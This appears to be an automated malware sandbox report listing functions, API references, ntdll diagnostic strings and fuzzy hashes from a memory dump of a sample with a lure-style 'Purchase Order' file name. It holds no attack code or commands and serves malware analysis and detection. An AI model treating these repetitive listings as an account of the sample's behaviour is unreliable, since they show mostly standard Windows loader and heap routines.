                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-3224558752
                                            • Opcode ID: fdfef8d944cae3664e8f3e49e419117aa6bd29922d8120a32583b5397f7b1c84
                                            • Instruction ID: d4d7d5bd2e5e0145cf9325ec2d596f380840ebb0cc92fb8adbb7e92c5cbfbf1b
                                            • Opcode Fuzzy Hash: fdfef8d944cae3664e8f3e49e419117aa6bd29922d8120a32583b5397f7b1c84
                                            • Instruction Fuzzy Hash: C1412775600748DFE702CF68C884B9AB7F8EF49364F108369E5119B791CB74A881CB91
                                            Function 348CF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 348CF250
                                            • RtlDebugPrintTimes.NTDLL ref: 348CF2C5
                                              • Part of subcall function 3481B970: LdrInitializeThunk.NTDLL ref: 3481B989
                                            Strings
                                            • Entry Heap Size , xrefs: 348CF26D
                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 348CF263
                                            • ---------------------------------------, xrefs: 348CF279
                                            • HEAP: , xrefs: 348CF15D
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$InitializeThunk
                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                            • API String ID: 1259822791-1102453626
                                            • Opcode ID: 4598106ee477c3cc930a60aa56a6ef53f5c016fabe186b0e0baf0dec8a7c9240
                                            • Instruction ID: acb2e470d6b4e7c38f9bcbf34b3a79b9acf9012d6a086627a92b33e6f2d65930
                                            • Opcode Fuzzy Hash: 4598106ee477c3cc930a60aa56a6ef53f5c016fabe186b0e0baf0dec8a7c9240
                                            • Instruction Fuzzy Hash: 2541AD79A00215DFE706CF18C984919BBF5FF8D354B2582AAD518AB355D731ED42CF80
                                            Function 3484DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-1222099010
                                            • Opcode ID: 9f27fb0fa9a4887b80f2f2ed513a16b5f499e62d526fa7c1836b3389ab756590
                                            • Instruction ID: 04e2786d3b5cde57c1ee378159d82d30d4a999a0c215fd14f1e811d72362a456
                                            • Opcode Fuzzy Hash: 9f27fb0fa9a4887b80f2f2ed513a16b5f499e62d526fa7c1836b3389ab756590
                                            • Instruction Fuzzy Hash: A531F539214BC8DFF313DB6CC804B867BE8EF05754F054299E4519B752DBB9A882CE61
                                            Function 3486B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: ed1972bf6fb30c1931441cf226a9445d6bb9f5487e93b28f1e0b37330c75cc38
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 2481C278E053698FEB448E6CC8517EEBBB6AF4539CF54431DDA62A7290DB3C98408B50
                                            Function 34829126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            • Opcode ID: 7cfeca1dbc7530bb2d77cb20ebaad985feaa3e6ce01cdd77ee54d3087ee42a24
                                            • Instruction ID: 14a9f548a605801db062a266d2e6d3cedc18b28e18d466864fc9d30c17f92f0c
                                            • Opcode Fuzzy Hash: 7cfeca1dbc7530bb2d77cb20ebaad985feaa3e6ce01cdd77ee54d3087ee42a24
                                            • Instruction Fuzzy Hash: 018119B5D00269DFEB21CB54CD44BDAB7B8AF09750F0042EAE919B7280D7709E85CFA0
                                            Function 34854D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • LdrpFindDllActivationContext, xrefs: 34893636, 34893662
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 34893640, 3489366C
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 3489365C
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3489362F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-3779518884
                                            • Opcode ID: 2b36a854448c2713a89ebdb544662f9fdd53938007ab34a59d78f1285ac12c64
                                            • Instruction ID: 95ecc03cee4fea2ba21103e47f380ea5e37c6cb403f73372c3968126cb19748a
                                            • Opcode Fuzzy Hash: 2b36a854448c2713a89ebdb544662f9fdd53938007ab34a59d78f1285ac12c64
                                            • Instruction Fuzzy Hash: B4311876A01715BFFB219B06C844B95B7E8FB05F94F4283EAE81467270DBA09C84CB95
                                            Function 348D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: ca889846f84917bf841fa8843c7b5743305f59a356e6187748b825afa997de30
                                            • Instruction ID: d9b7be96e4e4d94d07634eb1f8f8cc009181e2fd57aa3874995f037f60231892
                                            • Opcode Fuzzy Hash: ca889846f84917bf841fa8843c7b5743305f59a356e6187748b825afa997de30
                                            • Instruction Fuzzy Hash: EA216776901119AFDB00DFB9CC40AEE7BF8FF59654F44421AE915E3200E730EA018BA1
                                            Function 3481F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3610490719
                                            • Opcode ID: 26dcba886de15ef981d7b569d8122bad66023ba1e36ee2805b4a2a33ee4f9f59
                                            • Instruction ID: 66d889d3d2b92fcfcdfcb2a87a53a451905e33db96829390b536e92393fd30d5
                                            • Opcode Fuzzy Hash: 26dcba886de15ef981d7b569d8122bad66023ba1e36ee2805b4a2a33ee4f9f59
                                            • Instruction Fuzzy Hash: F591F975704745DFF316DF28C894B2ABBA9BF44644F00075BEA519B342DB78E881CB91
                                            Function 3485C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 348982DE
                                            • Failed to reallocate the system dirs string !, xrefs: 348982D7
                                            • minkernel\ntdll\ldrinit.c, xrefs: 348982E8
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1783798831
                                            • Opcode ID: 4dcc80c5bb8c998d53117f069d1eb02d30b5c19613ab914c59617601ebb51be4
                                            • Instruction ID: dedab42003902c337389aa76b5db72e9305873f4eaf237acbb9a17c0c091d571
                                            • Opcode Fuzzy Hash: 4dcc80c5bb8c998d53117f069d1eb02d30b5c19613ab914c59617601ebb51be4
                                            • Instruction Fuzzy Hash: 4141C0B5519304EFE711DB68CC40B4B7BE8EF49790F004A2AF955A7260EBB0D805CF95
                                            Function 3485BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 34897BAC
                                            • RTL: Resource at %p, xrefs: 34897B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34897B7F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 4651036bccc52e5213d4539b34b38d29dab81a775fb251429226319949a7316d
                                            • Instruction ID: 6a433154107f619d6c127c4d80966e42d4890cef234f0ec1b3215fd4683c3029
                                            • Opcode Fuzzy Hash: 4651036bccc52e5213d4539b34b38d29dab81a775fb251429226319949a7316d
                                            • Instruction Fuzzy Hash: 3441CD35701B069FE710CE29C840B9AB7E5EF98721F100B6DF95A9B690DB71E8058F91
                                            Function 3485B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3489728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 348972C1
                                            • RTL: Resource at %p, xrefs: 348972A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34897294
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 5fc344e8c6267190987513de2940be9384a7c4b9e1d115811241a5be6789ffd9
                                            • Instruction ID: e5ffb9944025e6939229b86a0929f9f437b149441328ab10c6efc90830ff6fdf
                                            • Opcode Fuzzy Hash: 5fc344e8c6267190987513de2940be9384a7c4b9e1d115811241a5be6789ffd9
                                            • Instruction Fuzzy Hash: BE410E35B00A06EFE724CE68CC40B96B7E5FF94724F100759F965AB340DB61E8468BD1
                                            Function 348A4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • LdrpCheckRedirection, xrefs: 348A488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 348A4899
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 348A4888
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            • Opcode ID: a013df7b0e45ac4eb6fe57014c82d2817024d5658f692f6c3e653d4901c0599f
                                            • Instruction ID: 9623b1b744c726725cd5e0e8307498b1678f33dc0ceed4027be0ab3ba8b6872b
                                            • Opcode Fuzzy Hash: a013df7b0e45ac4eb6fe57014c82d2817024d5658f692f6c3e653d4901c0599f
                                            • Instruction Fuzzy Hash: 7C41C176A047949FEF11CE68D840A567BE9EF89E90F02076DEC54AB311D7B1D800DB92
                                            Function 348D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 665b2515e1122fc53f84207852f49255f3dc2726cb0d2b6a01857091c01e5251
                                            • Instruction ID: 6a8f1f47e5a9131008af57b87ca46353df2d27c63b88929a62f7e03df8f6a0c0
                                            • Opcode Fuzzy Hash: 665b2515e1122fc53f84207852f49255f3dc2726cb0d2b6a01857091c01e5251
                                            • Instruction Fuzzy Hash: 17316676A01219DFDB14CF2DCC40BEE77B8EF45650F90465AE859E3240EB30DA459FA1
                                            Function 348A5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Wow64 Emulation Layer
                                            • API String ID: 3446177414-921169906
                                            • Opcode ID: 46082d4d251720bc4c1c8dfca43e54bda039eda71e42dc59499ba796822179d3
                                            • Instruction ID: d503ce92a07e71145616e6067348441644bb62f2407b85cade41cff3ee5ffea4
                                            • Opcode Fuzzy Hash: 46082d4d251720bc4c1c8dfca43e54bda039eda71e42dc59499ba796822179d3
                                            • Instruction Fuzzy Hash: 8F211776A0111DFFAB019AA4CD84CBF7B7DEF442A8F044168FE11A6240E6719E45DF64
                                            Function 3484EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d30ece5693f3331eb1ae477bd81fc29246ef015f004bf61aec035df27ce6e91c
                                            • Instruction ID: e52ce839f297e88c27c8a34dc29c8fef62168c6df6b6224dae711219c78f2d5d
                                            • Opcode Fuzzy Hash: d30ece5693f3331eb1ae477bd81fc29246ef015f004bf61aec035df27ce6e91c
                                            • Instruction Fuzzy Hash: E7E1CE75E00608DFEB21CFA9C980AADBBF5BF48354F10466EEA55A7760DB70A941CF10
                                            Function 3489EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 008b81be4378d90ce50fa31a6303466d8799602394411dfe6efda5683fd57565
                                            • Instruction ID: e52e927765360cd718fb0b16555609b6cdc061f19d1f719c606ec837e14361db
                                            • Opcode Fuzzy Hash: 008b81be4378d90ce50fa31a6303466d8799602394411dfe6efda5683fd57565
                                            • Instruction Fuzzy Hash: 42713471E00619AFEF0ACFA4C980ADDBBF5FF48354F14422AEA05AB250D774A905CF94
                                            Function 3489F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: dc368499b92150f37c63c52e05008e70c740257587d8cf28493df1f4ca814c1c
                                            • Instruction ID: 1e0618e533bae6a85853786757736b67f04840624a6fae53a45945af4f01647c
                                            • Opcode Fuzzy Hash: dc368499b92150f37c63c52e05008e70c740257587d8cf28493df1f4ca814c1c
                                            • Instruction Fuzzy Hash: 3F5132B6E006199FEF08CF98D941ACCBBF5BF48364F14822AEA15BB250D7389941CF54
                                            Function 348259C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 3ec480aca5cac6680894fc1796dead6e8a5d0ee049d9d02bcaffdcaf997e2853
                                            • Instruction ID: 1b27ceb8f297ade7b7321d2b9a8459571621df597d743423fe63e6b75e9150aa
                                            • Opcode Fuzzy Hash: 3ec480aca5cac6680894fc1796dead6e8a5d0ee049d9d02bcaffdcaf997e2853
                                            • Instruction Fuzzy Hash: 67326674E45369DFEB61CF68C884BD9BBB4BB08304F0042E9D559A7251EBB49AC4CF90
                                            Function 34867D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: f2f779bcd96e67e82a0bfd72759ff767a4b96af8f56fa48329f9e118490721c0
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: A091DB74E00209DFEB90DE59C881AAEB7A5EF44768F504B1EEE56E72C4DB7C89408790
                                            Function 34854C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: 17978f855661c78c01df65dbda7182e195be06bd6ea1b28c349d2ff679eab276
                                            • Instruction ID: 447e275a19a9e1bc49116223c8d05db0d1bf0359efa409b41dc3a5ed07f27059
                                            • Opcode Fuzzy Hash: 17978f855661c78c01df65dbda7182e195be06bd6ea1b28c349d2ff679eab276
                                            • Instruction Fuzzy Hash: A851E3B5E00608DFEB15CF9AC48479DFBF4EF48B94F14826ED0099B260EB709985CB80
                                            Function 348204E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • kLsE, xrefs: 34820540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3482063D
                                            Memory Dump Source
